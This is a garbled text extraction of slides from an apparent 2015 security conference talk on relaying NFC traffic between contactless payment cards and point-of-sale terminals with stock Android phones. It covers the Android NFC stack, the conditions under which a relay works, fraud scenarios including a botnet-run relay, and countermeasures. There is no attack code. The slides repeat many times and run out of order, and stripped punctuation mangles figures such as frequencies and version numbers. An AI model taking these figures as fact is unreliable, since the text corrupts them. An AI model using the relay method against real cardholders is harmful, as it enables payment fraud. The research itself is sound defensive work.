Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (I)
What is NFCBidirectional short-range contactless communication technology
Up to 10 cm
Based on RFID standards works in the 1356 MHz spectrum
Data transfer rates vary 106 216 and 424 kbps
Security based on proximity concern physical constraints
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 5 36
Introduction to NFC (II)
Wow NFC sounds pretty hipsterTwo main elements
Proximity Coupling Device (PCD also NFC-capable device)Proximity Integrated Circuit Cards (PICC also NFC tags)
Three operation modesPeer to peer direct communication between partiesReadwrite communication with a NFC tagCard-emulation an NFC device behaves as a tag
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 6 36
Introduction to NFC (III)
ISOIEC 14443 standardFour-part international standard forcontactless smartcards
1 Size physical characteristics etc2 RF power and signalling schemes
(Type A amp B)Half-duplex 106 kbps rate
3 Initialization + anticollision protocol4 Data transmission protocol
IsoDep cards compliant with the fourparts
Example contactless payment cards
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 7 36
Introduction to NFC (IV)
ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards
Application Protocol Data Units (APDUs)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (V)
[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36
Introduction to NFC (VI)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36
Introduction to NFC (VII)
Ok So is it secure right Right
If it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
